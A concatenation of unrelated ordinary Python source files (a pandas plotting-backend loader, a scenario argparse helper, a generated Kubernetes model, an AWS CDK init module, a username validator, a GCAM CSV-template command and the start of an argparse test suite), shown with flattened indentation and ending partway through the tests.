Return the plotting backend to use (e.g. `pandas.plotting._matplotlib`).
The plotting system of pandas has been using matplotlib, but the idea here
is that it can also work with other third-party backends. In the future,
this function will return the backend from a pandas option, and all the
rest of the code in this file will use the backend specified there for the
plotting.
The backend is imported lazily, as matplotlib is a soft dependency, and
pandas can be used without it being installed.
"""
backend = backend or get_option("plotting.backend")
if backend == "matplotlib":
# Because matplotlib is an optional dependency and first-party backend,
# we need to attempt an import here to raise an ImportError if needed.
try:
import pandas.plotting._matplotlib as module
except ImportError:
raise ImportError(
"matplotlib is required for plotting when the "
'default backend "matplotlib" is selected.'
) from None
_backends["matplotlib"] = module
if backend in _backends:
return _backends[backend]
module = _find_backend(backend)
_backends[backend] = module
return module
|
py
|
1a5f010f0ce5c521414c777afb60d18dd8ff2559
|
import argparse, os, collections
try:
import fcntl
def flock(f):
fcntl.flock(f, fcntl.LOCK_EX)
def funlock(f):
fcntl.flock(f, fcntl.LOCK_UN)
except ImportError:
# probably using windows
# rely on opportunistic file writing (hope that scenarios aren't
# added to completed_scenarios.txt at the same time by parallel processes)
# TODO: add support for file locking on windows, e.g., like
# https://www.safaribooksonline.com/library/view/python-cookbook/0596001673/ch04s25.html
def flock(f):
pass
def funlock(f):
pass
def iterify(item):
"""Return an iterable for the one or more items passed."""
if isinstance(item, basestring):
i = iter([item])
else:
try:
# check if it's iterable
i = iter(item)
except TypeError:
i = iter([item])
return i
class AddModuleAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
for m in iterify(values):
setattr(namespace, m, True)
class RemoveModuleAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
for m in iterify(values):
setattr(namespace, m, False)
class AddListAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
if getattr(namespace, self.dest) is None:
setattr(namespace, self.dest, list())
getattr(namespace, self.dest).extend(iterify(values))
# define a standard argument parser, which can be used to setup scenarios
# NOTE: you can't safely use default values here, because those end up being
# assigned to cmd_line_args(), and then they override any values set for the
# standard scenarios.
parser = argparse.ArgumentParser(description='Solve one or more Switch-Hawaii scenarios.')
parser.add_argument('--inputs', dest='inputs_dir')
parser.add_argument('--inputs_subdir')
parser.add_argument('--outputs', dest='outputs_dir')
parser.add_argument('--scenario', action=AddListAction, dest='scenario_to_run')
parser.add_argument('--scenarios', action=AddListAction, nargs='+', dest='scenario_to_run')
parser.add_argument('--scenario_name')
parser.add_argument('--exclude', action=AddModuleAction, dest='exclude_module', nargs='+')
parser.add_argument('-n', action=RemoveModuleAction, dest='exclude_module')
parser.add_argument('--include', action=AddModuleAction, dest='include_module', nargs='+')
parser.add_argument('-y', action=AddModuleAction, dest='include_module')
parser.add_argument(action=AddModuleAction, dest='include_module', nargs='*')
def args_dict(*a):
"""call the parser to get the args, then return them as a dictionary, omitting None's'"""
return {k: v for k, v in vars(parser.parse_args(*a)).iteritems() if v is not None}
# report current command line arguments for use by various functions
# This is a function instead of a constant, so users can call
# scenarios.parser.add_argument() to add arguments of their own before evaluation
def cmd_line_args():
return args_dict()
def get_required_scenario_names():
"""Return list of names of scenario(s) that were requested or defined from the command line
via --scenario[s] or --scenario_name.
Return an empty list if none were requested/defined."""
a = cmd_line_args()
if "scenario_to_run" in a:
return a["scenario_to_run"]
elif "scenario_name" in a or not os.path.isfile('scenarios_to_run.txt'):
# They have defined one specific scenario on the command line, which is not based on any standard scenario,
# or there are no standard scenarios.
# Return a no-name scenario, which indicates to build the scenario without referring to any standard scenario.
return ['']
else:
# no specific scenarios were requested on the command line; run the standard scenarios instead
return []
def start_next_standard_scenario():
"""find the next scenario definition in 'scenarios_to_run.txt' that isn't reported
as having been completed in 'completed_scenarios.txt'.
Then report it as completed and return the scenario arguments
(including any modifications from the command line)."""
scenarios_list = get_standard_scenarios_dict()
for (s, args) in scenarios_list.iteritems():
if scenario_already_run(s):
continue
else:
return merge_scenarios(args, cmd_line_args())
return None # no more scenarios to run
def get_scenario_args(scenario):
"""Return the arguments for the specified standard scenario, amended with any command-line arguments.
This may also be called with an empty scenario name ('') to define a scenario using only command-line arguments."""
if scenario == '':
return merge_scenarios(cmd_line_args())
else:
scenario_list = get_standard_scenarios_dict()
if scenario not in scenario_list:
raise RuntimeError("Scenario {s} has not been defined.".format(s=scenario))
else:
return merge_scenarios(scenario_list[scenario], cmd_line_args())
def get_standard_scenarios_dict():
"""Return collection of standard scenarios, as defined in scenarios_to_run.txt.
They are returned as an OrderedDict with keys equal to the scenario names and values
that are each a dictionary of arguments for that scenario."""
# note: we read the list from the disk each time so that we get a fresher version
# if the standard list is changed during a long solution effort.
with open('scenarios_to_run.txt', 'r') as f:
# wait for exclusive access to the file (to avoid reading while the file is being changed)
flock(f)
scenarios_list = list(f.read().splitlines()) # note: ignores presence/absence of \n at end of file
funlock(f)
args_list = [args_dict(s.split(' ')) for s in scenarios_list]
return collections.OrderedDict([(s["scenario_name"], s) for s in args_list])
def merge_scenarios(*scenarios):
# combine scenarios: start with the first and then apply most settings from later ones
# but concatenate "tag" entries and remove "scenario_to_run" entries
d = dict(tag='')
for s in scenarios:
t1 = d["tag"]
t2 = s.get("tag", "")
s["tag"] = t1 + ("" if t1 == "" or t2 == "" else "_") + t2
d.update(s)
if 'scenario_to_run' in d:
del d['scenario_to_run']
return d
def report_completed_scenario(scenario):
scenario_already_run(scenario)
def scenario_already_run(scenario):
"""Add the specified scenario to the list in completed_scenarios.txt.
Return False if it wasn't there already."""
with open('completed_scenarios.txt', 'a+') as f:
# wait for exclusive access to the list (to avoid writing the same scenario twice in a race condition)
flock(f)
# file starts with pointer at end; move to start
f.seek(0, 0)
if scenario + '\n' in f:
already_run = True
else:
already_run = False
# append name to the list (will always go at end, because file was opened in 'a' mode)
f.write(scenario + '\n')
funlock(f)
return already_run
|
py
|
1a5f01426f329129d21784ed1664d2e6cc6d5248
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.18
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V1alpha1WebhookThrottleConfig(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'burst': 'int',
'qps': 'int'
}
attribute_map = {
'burst': 'burst',
'qps': 'qps'
}
def __init__(self, burst=None, qps=None, local_vars_configuration=None): # noqa: E501
"""V1alpha1WebhookThrottleConfig - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._burst = None
self._qps = None
self.discriminator = None
if burst is not None:
self.burst = burst
if qps is not None:
self.qps = qps
@property
def burst(self):
"""Gets the burst of this V1alpha1WebhookThrottleConfig. # noqa: E501
ThrottleBurst is the maximum number of events sent at the same moment default 15 QPS # noqa: E501
:return: The burst of this V1alpha1WebhookThrottleConfig. # noqa: E501
:rtype: int
"""
return self._burst
@burst.setter
def burst(self, burst):
"""Sets the burst of this V1alpha1WebhookThrottleConfig.
ThrottleBurst is the maximum number of events sent at the same moment default 15 QPS # noqa: E501
:param burst: The burst of this V1alpha1WebhookThrottleConfig. # noqa: E501
:type: int
"""
self._burst = burst
@property
def qps(self):
"""Gets the qps of this V1alpha1WebhookThrottleConfig. # noqa: E501
ThrottleQPS maximum number of batches per second default 10 QPS # noqa: E501
:return: The qps of this V1alpha1WebhookThrottleConfig. # noqa: E501
:rtype: int
"""
return self._qps
@qps.setter
def qps(self, qps):
"""Sets the qps of this V1alpha1WebhookThrottleConfig.
ThrottleQPS maximum number of batches per second default 10 QPS # noqa: E501
:param qps: The qps of this V1alpha1WebhookThrottleConfig. # noqa: E501
:type: int
"""
self._qps = qps
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1alpha1WebhookThrottleConfig):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1alpha1WebhookThrottleConfig):
return True
return self.to_dict() != other.to_dict()
|
py
|
1a5f016eb2fdc4f75061c30a71cfe4220aaa17eb
|
import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
import aws_cdk.aws_autoscaling._jsii
import aws_cdk.aws_cloudwatch._jsii
import aws_cdk.aws_ec2._jsii
import aws_cdk.aws_elasticloadbalancing._jsii
import aws_cdk.aws_elasticloadbalancingv2._jsii
import aws_cdk.aws_iam._jsii
import aws_cdk.aws_lambda._jsii
import aws_cdk.aws_s3._jsii
import aws_cdk.core._jsii
import aws_cdk.custom_resources._jsii
import constructs._jsii
__jsii_assembly__ = jsii.JSIIAssembly.load(
"@aws-cdk/aws-codedeploy",
"1.118.0",
__name__[0:-6],
"[email protected]",
)
__all__ = [
"__jsii_assembly__",
]
publication.publish()
|
py
|
1a5f02268307081fb573c3d45900eab8cbcb0d6f
|
#!/usr/bin/env python3
import re
def validate_user(username, minlen):
"""Checks if the received username matches the required conditions."""
if type(username) != str:
raise TypeError("username must be a string")
if minlen < 1:
raise ValueError("minlen must be at least 1")
# Usernames can't be shorter than minlen
if len(username) < minlen:
return False
# Usernames can only use letters, numbers, dots and underscores
if not re.match('^[a-z0-9._]*$', username):
return False
# Usernames can't begin with a number
if username[0].isnumeric():
return False
if username[0] == "_":
return False
if username[0] == ".":
return False
return True
|
py
|
1a5f0499048bb1ac33215b317b7f4e022d788d92
|
"""
.. Generate a CSV file template used to define mitigation policies
.. codeauthor:: Rich Plevin <[email protected]>
.. Copyright (c) 2020 Richard Plevin
See the https://opensource.org/licenses/MIT for license details.
"""
#
# TBD: need to merge aspects of ZEVPolicy into this, e.g., handling of
# TBD: --include flag, including "market" in CSV output.
#
# There are two basic policy types: RES policies (ZEV and RES) and technology
# forcing policies that directly change efficiency or coefficients over time.
#
from ..subcommand import SubcommandABC, clean_help
from ..log import getLogger
_logger = getLogger(__name__)
def element_path(elt):
"""
Walk up the XML structure from the given element, producing a tuple with the
names of the region, sector, subsector, technology, and input found in this
"path".
:param elt: (lxml.etree.Element) an "input" element to start from
:return: tuple of strings: (region, sector, subsector, technology, input)
"""
input = elt.attrib['name']
sector = subsector = technology = region = None
for node in elt.iterancestors(): # walk up the hierarchy
tag = node.tag
attr = node.attrib
if tag == 'period':
continue
elif tag == 'location-info':
sector = attr['sector-name']
subsector = attr['subsector-name']
elif tag == 'region':
region = attr['name' ]
break
elif tag == 'supplysector':
sector = attr['name']
elif tag in ('stub-technology', 'technology'):
technology = attr['name']
elif tag in ('subsector', 'tranSubsector'):
subsector = attr['name']
elif tag in ('global-technology-database'):
break
return (region, sector, subsector, technology, input)
def save_template(f, args, years, xml_file, xpath, which):
from ..config import getParam
from ..utils import pathjoin
from ..XMLFile import XMLFile
# TBD: Make this more flexible. Create config param for this, let user override?
gcamDir = getParam('GCAM.RefWorkspace', section=args.projectName)
pathname = pathjoin(gcamDir, 'input', 'gcamdata', 'xml', xml_file)
_logger.info("Reading {}".format(pathname))
xml = XMLFile(pathname)
root = xml.getRoot()
nodes = root.xpath(xpath)
paths = sorted(set([element_path(node) for node in nodes])) # use 'set' to remove dupes
# filter out sectors missing from cmdline arg, if specified
if args.sectors:
desired = []
sectors = set(args.sectors.split(','))
for path in paths:
if path[0] in sectors:
desired.append(path)
paths = desired
all_regions = set(root.xpath('//region/@name'))
if args.GCAM_USA:
all_regions = all_regions.difference(['USA']) # remove USA since states will be used
regions = args.regions.split(',') if args.regions else all_regions
regions = sorted(regions)
zeroes = ',0' * len(years) # fill in with zeroes for reading into a dataframe
# data values
for region in regions:
if region not in all_regions: # use only regions defined for this XML file
continue
for tup in paths:
f.write(which + ',' + region + ',')
f.write(','.join(tup))
f.write(zeroes + '\n')
DEFAULT_OUTPUT_FILE = '{target}_template.csv'
class CsvTemplateCommand(SubcommandABC):
def __init__(self, subparsers):
kwargs = {'help' : '''Dump combinations of regions, sectors, subsectors, techs, and fuels
for use in generating XML policy input files.'''}
super(CsvTemplateCommand, self).__init__('csvTemplate', subparsers, kwargs, group='project')
def addArgs(self, parser):
# positional argument
parser.add_argument('target', choices=['buildingTech', 'buildingElec', 'transportTech', 'RES', 'ZEV'],
help=clean_help('''The policy target.'''))
parser.add_argument('-i', '--include', action='append', default=None,
help=clean_help('''A colon (":") delimited list of comma-delimited sectors,
subsectors, and technologies to include in the CSV template file.
Example: "--include trn_pass_road_LDV_4W::BEV,FCEV" means include only two
technologies (BEV,FCEV), but for any subsector under the specified sector.
Multiple -I arguments are allowed.'''))
parser.add_argument('-o', '--outputFile', default=None,
help=clean_help('''The CSV file to create with lists of unique regions, sectors,
subsectors, technologies, and inputs. Default is "[GCAM.CsvTemplateDir]/{}".
Use an absolute path to generate the file to another location.'''.format(
DEFAULT_OUTPUT_FILE)))
parser.add_argument('-s', '--sectors', default=None,
help=clean_help('''A comma-delimited list of sectors to include in the generated template. Use quotes
around the argument if there are embedded blanks. By default, all known building technology
sectors are included.'''))
parser.add_argument('-r', '--regions', default=None,
help=clean_help('''A comma-delimited list of regions to include in the generated template.
By default all regions are included. '''))
parser.add_argument('-u', '--GCAM-USA', action="store_true",
help=clean_help('''If set, produce output compatible with GCAM-USA regions.'''))
parser.add_argument('-y', '--years', default='2015-2100',
help=clean_help('''A hyphen-separated range of timestep years to include in the generated template.
Default is "2015-2100"'''))
return parser
def run(self, args, tool):
from ..utils import pathjoin, validate_years, get_path
from ..config import getParam
from ..error import CommandlineError
years = validate_years(args.years)
if years is None:
raise CommandlineError('Year argument must be two integers separated by a hyphen, '
'with second > first. Got "{}"'.format(args.years))
target = args.target
outputFile = args.outputFile or DEFAULT_OUTPUT_FILE.format(target=target)
outputPath = get_path(outputFile, pathjoin(getParam("GCAM.ProjectDir"), "etc"))
# TBD: allow specification of full path to xml files?
if target == 'buildingTech':
main_xml_file = 'building_det.xml'
usa_xml_file = 'building_USA.xml'
main_xpath = '//supplysector/subsector/stub-technology/period/minicam-energy-input'
usa_xpath = '//global-technology-database/location-info/technology/period/minicam-energy-input'
elif target == 'buildingElec':
pass # TBD
elif target == 'transportTech':
pass # TBD
elif target == 'RES':
pass # TBD
elif target == 'ZEV':
pass # TBD
_logger.info('Writing %s', outputPath)
with open(outputPath, 'w') as f:
# column headers
f.write("which,region,market,sector,subsector,technology,input,")
f.write(','.join(map(str, years)))
f.write("\n")
save_template(f, args, years, main_xml_file, main_xpath, 'GCAM-32')
if args.GCAM_USA:
save_template(f, args, years, usa_xml_file, usa_xpath, 'GCAM-USA')
|
py
|
1a5f05e30b9fab993609463fb693b4ab0ad59bc1
|
# Author: Steven J. Bethard <[email protected]>.
import codecs
import inspect
import os
import shutil
import stat
import sys
import textwrap
import tempfile
import unittest
import argparse
from StringIO import StringIO
class StdIOBuffer(StringIO):
pass
from test import test_support
class TestCase(unittest.TestCase):
def assertEqual(self, obj1, obj2):
if obj1 != obj2:
print('')
print(repr(obj1))
print(repr(obj2))
print(obj1)
print(obj2)
super(TestCase, self).assertEqual(obj1, obj2)
def setUp(self):
# The tests assume that line wrapping occurs at 80 columns, but this
# behaviour can be overridden by setting the COLUMNS environment
# variable. To ensure that this assumption is true, unset COLUMNS.
env = test_support.EnvironmentVarGuard()
env.unset("COLUMNS")
self.addCleanup(env.__exit__)
class TempDirMixin(object):
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.old_dir = os.getcwd()
os.chdir(self.temp_dir)
def tearDown(self):
os.chdir(self.old_dir)
shutil.rmtree(self.temp_dir, True)
def create_readonly_file(self, filename):
file_path = os.path.join(self.temp_dir, filename)
with open(file_path, 'w') as file:
file.write(filename)
os.chmod(file_path, stat.S_IREAD)
class Sig(object):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
class NS(object):
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def __repr__(self):
sorted_items = sorted(self.__dict__.items())
kwarg_str = ', '.join(['%s=%r' % tup for tup in sorted_items])
return '%s(%s)' % (type(self).__name__, kwarg_str)
__hash__ = None
def __eq__(self, other):
return vars(self) == vars(other)
def __ne__(self, other):
return not (self == other)
class ArgumentParserError(Exception):
def __init__(self, message, stdout=None, stderr=None, error_code=None):
Exception.__init__(self, message, stdout, stderr)
self.message = message
self.stdout = stdout
self.stderr = stderr
self.error_code = error_code
def stderr_to_parser_error(parse_args, *args, **kwargs):
# if this is being called recursively and stderr or stdout is already being
# redirected, simply call the function and let the enclosing function
# catch the exception
if isinstance(sys.stderr, StdIOBuffer) or isinstance(sys.stdout, StdIOBuffer):
return parse_args(*args, **kwargs)
# if this is not being called recursively, redirect stderr and
# use it as the ArgumentParserError message
old_stdout = sys.stdout
old_stderr = sys.stderr
sys.stdout = StdIOBuffer()
sys.stderr = StdIOBuffer()
try:
try:
result = parse_args(*args, **kwargs)
for key in list(vars(result)):
if getattr(result, key) is sys.stdout:
setattr(result, key, old_stdout)
if getattr(result, key) is sys.stderr:
setattr(result, key, old_stderr)
return result
except SystemExit:
code = sys.exc_info()[1].code
stdout = sys.stdout.getvalue()
stderr = sys.stderr.getvalue()
raise ArgumentParserError("SystemExit", stdout, stderr, code)
finally:
sys.stdout = old_stdout
sys.stderr = old_stderr
class ErrorRaisingArgumentParser(argparse.ArgumentParser):
def parse_args(self, *args, **kwargs):
parse_args = super(ErrorRaisingArgumentParser, self).parse_args
return stderr_to_parser_error(parse_args, *args, **kwargs)
def exit(self, *args, **kwargs):
exit = super(ErrorRaisingArgumentParser, self).exit
return stderr_to_parser_error(exit, *args, **kwargs)
def error(self, *args, **kwargs):
error = super(ErrorRaisingArgumentParser, self).error
return stderr_to_parser_error(error, *args, **kwargs)
class ParserTesterMetaclass(type):
"""Adds parser tests using the class attributes.
Classes of this type should specify the following attributes:
argument_signatures -- a list of Sig objects which specify
the signatures of Argument objects to be created
failures -- a list of args lists that should cause the parser
to fail
successes -- a list of (initial_args, options, remaining_args) tuples
where initial_args specifies the string args to be parsed,
options is a dict that should match the vars() of the options
parsed out of initial_args, and remaining_args should be any
remaining unparsed arguments
"""
def __init__(cls, name, bases, bodydict):
if name == 'ParserTestCase':
return
# default parser signature is empty
if not hasattr(cls, 'parser_signature'):
cls.parser_signature = Sig()
if not hasattr(cls, 'parser_class'):
cls.parser_class = ErrorRaisingArgumentParser
# ---------------------------------------
# functions for adding optional arguments
# ---------------------------------------
def no_groups(parser, argument_signatures):
"""Add all arguments directly to the parser"""
for sig in argument_signatures:
parser.add_argument(*sig.args, **sig.kwargs)
def one_group(parser, argument_signatures):
"""Add all arguments under a single group in the parser"""
group = parser.add_argument_group('foo')
for sig in argument_signatures:
group.add_argument(*sig.args, **sig.kwargs)
def many_groups(parser, argument_signatures):
"""Add each argument in its own group to the parser"""
for i, sig in enumerate(argument_signatures):
group = parser.add_argument_group('foo:%i' % i)
group.add_argument(*sig.args, **sig.kwargs)
# --------------------------
# functions for parsing args
# --------------------------
def listargs(parser, args):
"""Parse the args by passing in a list"""
return parser.parse_args(args)
def sysargs(parser, args):
"""Parse the args by defaulting to sys.argv"""
old_sys_argv = sys.argv
sys.argv = [old_sys_argv[0]] + args
try:
return parser.parse_args()
finally:
sys.argv = old_sys_argv
# class that holds the combination of one optional argument
# addition method and one arg parsing method
class AddTests(object):
def __init__(self, tester_cls, add_arguments, parse_args):
self._add_arguments = add_arguments
self._parse_args = parse_args
add_arguments_name = self._add_arguments.__name__
parse_args_name = self._parse_args.__name__
for test_func in [self.test_failures, self.test_successes]:
func_name = test_func.__name__
names = func_name, add_arguments_name, parse_args_name
test_name = '_'.join(names)
def wrapper(self, test_func=test_func):
test_func(self)
try:
wrapper.__name__ = test_name
except TypeError:
pass
setattr(tester_cls, test_name, wrapper)
def _get_parser(self, tester):
args = tester.parser_signature.args
kwargs = tester.parser_signature.kwargs
parser = tester.parser_class(*args, **kwargs)
self._add_arguments(parser, tester.argument_signatures)
return parser
def test_failures(self, tester):
parser = self._get_parser(tester)
for args_str in tester.failures:
args = args_str.split()
raises = tester.assertRaises
raises(ArgumentParserError, parser.parse_args, args)
def test_successes(self, tester):
parser = self._get_parser(tester)
for args, expected_ns in tester.successes:
if isinstance(args, str):
args = args.split()
result_ns = self._parse_args(parser, args)
tester.assertEqual(expected_ns, result_ns)
# add tests for each combination of an optionals adding method
# and an arg parsing method
for add_arguments in [no_groups, one_group, many_groups]:
for parse_args in [listargs, sysargs]:
AddTests(cls, add_arguments, parse_args)
bases = TestCase,
ParserTestCase = ParserTesterMetaclass('ParserTestCase', bases, {})
# ===============
# Optionals tests
# ===============
class TestOptionalsSingleDash(ParserTestCase):
"""Test an Optional with a single-dash option string"""
argument_signatures = [Sig('-x')]
failures = ['-x', 'a', '--foo', '-x --foo', '-x -y']
successes = [
('', NS(x=None)),
('-x a', NS(x='a')),
('-xa', NS(x='a')),
('-x -1', NS(x='-1')),
('-x-1', NS(x='-1')),
]
class TestOptionalsSingleDashCombined(ParserTestCase):
"""Test an Optional with a single-dash option string"""
argument_signatures = [
Sig('-x', action='store_true'),
Sig('-yyy', action='store_const', const=42),
Sig('-z'),
]
failures = ['a', '--foo', '-xa', '-x --foo', '-x -z', '-z -x',
'-yx', '-yz a', '-yyyx', '-yyyza', '-xyza']
successes = [
('', NS(x=False, yyy=None, z=None)),
('-x', NS(x=True, yyy=None, z=None)),
('-za', NS(x=False, yyy=None, z='a')),
('-z a', NS(x=False, yyy=None, z='a')),
('-xza', NS(x=True, yyy=None, z='a')),
('-xz a', NS(x=True, yyy=None, z='a')),
('-x -za', NS(x=True, yyy=None, z='a')),
('-x -z a', NS(x=True, yyy=None, z='a')),
('-y', NS(x=False, yyy=42, z=None)),
('-yyy', NS(x=False, yyy=42, z=None)),
('-x -yyy -za', NS(x=True, yyy=42, z='a')),
('-x -yyy -z a', NS(x=True, yyy=42, z='a')),
]
class TestOptionalsSingleDashLong(ParserTestCase):
"""Test an Optional with a multi-character single-dash option string"""
argument_signatures = [Sig('-foo')]
failures = ['-foo', 'a', '--foo', '-foo --foo', '-foo -y', '-fooa']
successes = [
('', NS(foo=None)),
('-foo a', NS(foo='a')),
('-foo -1', NS(foo='-1')),
('-fo a', NS(foo='a')),
('-f a', NS(foo='a')),
]
class TestOptionalsSingleDashSubsetAmbiguous(ParserTestCase):
"""Test Optionals where option strings are subsets of each other"""
argument_signatures = [Sig('-f'), Sig('-foobar'), Sig('-foorab')]
failures = ['-f', '-foo', '-fo', '-foo b', '-foob', '-fooba', '-foora']
successes = [
('', NS(f=None, foobar=None, foorab=None)),
('-f a', NS(f='a', foobar=None, foorab=None)),
('-fa', NS(f='a', foobar=None, foorab=None)),
('-foa', NS(f='oa', foobar=None, foorab=None)),
('-fooa', NS(f='ooa', foobar=None, foorab=None)),
('-foobar a', NS(f=None, foobar='a', foorab=None)),
('-foorab a', NS(f=None, foobar=None, foorab='a')),
]
class TestOptionalsSingleDashAmbiguous(ParserTestCase):
"""Test Optionals that partially match but are not subsets"""
argument_signatures = [Sig('-foobar'), Sig('-foorab')]
failures = ['-f', '-f a', '-fa', '-foa', '-foo', '-fo', '-foo b']
successes = [
('', NS(foobar=None, foorab=None)),
('-foob a', NS(foobar='a', foorab=None)),
('-foor a', NS(foobar=None, foorab='a')),
('-fooba a', NS(foobar='a', foorab=None)),
('-foora a', NS(foobar=None, foorab='a')),
('-foobar a', NS(foobar='a', foorab=None)),
('-foorab a', NS(foobar=None, foorab='a')),
]
class TestOptionalsNumeric(ParserTestCase):
"""Test an Optional with a short opt string"""
argument_signatures = [Sig('-1', dest='one')]
failures = ['-1', 'a', '-1 --foo', '-1 -y', '-1 -1', '-1 -2']
successes = [
('', NS(one=None)),
('-1 a', NS(one='a')),
('-1a', NS(one='a')),
('-1-2', NS(one='-2')),
]
class TestOptionalsDoubleDash(ParserTestCase):
"""Test an Optional with a double-dash option string"""
argument_signatures = [Sig('--foo')]
failures = ['--foo', '-f', '-f a', 'a', '--foo -x', '--foo --bar']
successes = [
('', NS(foo=None)),
('--foo a', NS(foo='a')),
('--foo=a', NS(foo='a')),
('--foo -2.5', NS(foo='-2.5')),
('--foo=-2.5', NS(foo='-2.5')),
]
class TestOptionalsDoubleDashPartialMatch(ParserTestCase):
"""Tests partial matching with a double-dash option string"""
argument_signatures = [
Sig('--badger', action='store_true'),
Sig('--bat'),
]
failures = ['--bar', '--b', '--ba', '--b=2', '--ba=4', '--badge 5']
successes = [
('', NS(badger=False, bat=None)),
('--bat X', NS(badger=False, bat='X')),
('--bad', NS(badger=True, bat=None)),
('--badg', NS(badger=True, bat=None)),
('--badge', NS(badger=True, bat=None)),
('--badger', NS(badger=True, bat=None)),
]
class TestOptionalsDoubleDashPrefixMatch(ParserTestCase):
"""Tests when one double-dash option string is a prefix of another"""
argument_signatures = [
Sig('--badger', action='store_true'),
Sig('--ba'),
]
failures = ['--bar', '--b', '--ba', '--b=2', '--badge 5']
successes = [
('', NS(badger=False, ba=None)),
('--ba X', NS(badger=False, ba='X')),
('--ba=X', NS(badger=False, ba='X')),
('--bad', NS(badger=True, ba=None)),
('--badg', NS(badger=True, ba=None)),
('--badge', NS(badger=True, ba=None)),
('--badger', NS(badger=True, ba=None)),
]
class TestOptionalsSingleDoubleDash(ParserTestCase):
"""Test an Optional with single- and double-dash option strings"""
argument_signatures = [
Sig('-f', action='store_true'),
Sig('--bar'),
Sig('-baz', action='store_const', const=42),
]
failures = ['--bar', '-fbar', '-fbaz', '-bazf', '-b B', 'B']
successes = [
('', NS(f=False, bar=None, baz=None)),
('-f', NS(f=True, bar=None, baz=None)),
('--ba B', NS(f=False, bar='B', baz=None)),
('-f --bar B', NS(f=True, bar='B', baz=None)),
('-f -b', NS(f=True, bar=None, baz=42)),
('-ba -f', NS(f=True, bar=None, baz=42)),
]
class TestOptionalsAlternatePrefixChars(ParserTestCase):
"""Test an Optional with option strings with custom prefixes"""
parser_signature = Sig(prefix_chars='+:/', add_help=False)
argument_signatures = [
Sig('+f', action='store_true'),
Sig('::bar'),
Sig('/baz', action='store_const', const=42),
]
failures = ['--bar', '-fbar', '-b B', 'B', '-f', '--bar B', '-baz', '-h', '--help', '+h', '::help', '/help']
successes = [
('', NS(f=False, bar=None, baz=None)),
('+f', NS(f=True, bar=None, baz=None)),
('::ba B', NS(f=False, bar='B', baz=None)),
('+f ::bar B', NS(f=True, bar='B', baz=None)),
('+f /b', NS(f=True, bar=None, baz=42)),
('/ba +f', NS(f=True, bar=None, baz=42)),
]
class TestOptionalsAlternatePrefixCharsAddedHelp(ParserTestCase):
"""When ``-`` not in prefix_chars, default operators created for help
should use the prefix_chars in use rather than - or --
http://bugs.python.org/issue9444"""
parser_signature = Sig(prefix_chars='+:/', add_help=True)
argument_signatures = [
Sig('+f', action='store_true'),
Sig('::bar'),
Sig('/baz', action='store_const', const=42),
]
failures = ['--bar', '-fbar', '-b B', 'B', '-f', '--bar B', '-baz']
successes = [
('', NS(f=False, bar=None, baz=None)),
('+f', NS(f=True, bar=None, baz=None)),
('::ba B', NS(f=False, bar='B', baz=None)),
('+f ::bar B', NS(f=True, bar='B', baz=None)),
('+f /b', NS(f=True, bar=None, baz=42)),
('/ba +f', NS(f=True, bar=None, baz=42))
]
class TestOptionalsAlternatePrefixCharsMultipleShortArgs(ParserTestCase):
"""Verify that Optionals must be called with their defined prefixes"""
parser_signature = Sig(prefix_chars='+-', add_help=False)
argument_signatures = [
Sig('-x', action='store_true'),
Sig('+y', action='store_true'),
Sig('+z', action='store_true'),
]
failures = ['-w',
'-xyz',
'+x',
'-y',
'+xyz',
]
successes = [
('', NS(x=False, y=False, z=False)),
('-x', NS(x=True, y=False, z=False)),
('+y -x', NS(x=True, y=True, z=False)),
('+yz -x', NS(x=True, y=True, z=True)),
]
class TestOptionalsShortLong(ParserTestCase):
"""Test a combination of single- and double-dash option strings"""
argument_signatures = [
Sig('-v', '--verbose', '-n', '--noisy', action='store_true'),
]
failures = ['--x --verbose', '-N', 'a', '-v x']
successes = [
('', NS(verbose=False)),
('-v', NS(verbose=True)),
('--verbose', NS(verbose=True)),
('-n', NS(verbose=True)),
('--noisy', NS(verbose=True)),
]
class TestOptionalsDest(ParserTestCase):
"""Tests various means of setting destination"""
argument_signatures = [Sig('--foo-bar'), Sig('--baz', dest='zabbaz')]
failures = ['a']
successes = [
('--foo-bar f', NS(foo_bar='f', zabbaz=None)),
('--baz g', NS(foo_bar=None, zabbaz='g')),
('--foo-bar h --baz i', NS(foo_bar='h', zabbaz='i')),
('--baz j --foo-bar k', NS(foo_bar='k', zabbaz='j')),
]
class TestOptionalsDefault(ParserTestCase):
"""Tests specifying a default for an Optional"""
argument_signatures = [Sig('-x'), Sig('-y', default=42)]
failures = ['a']
successes = [
('', NS(x=None, y=42)),
('-xx', NS(x='x', y=42)),
('-yy', NS(x=None, y='y')),
]
class TestOptionalsNargsDefault(ParserTestCase):
"""Tests not specifying the number of args for an Optional"""
argument_signatures = [Sig('-x')]
failures = ['a', '-x']
successes = [
('', NS(x=None)),
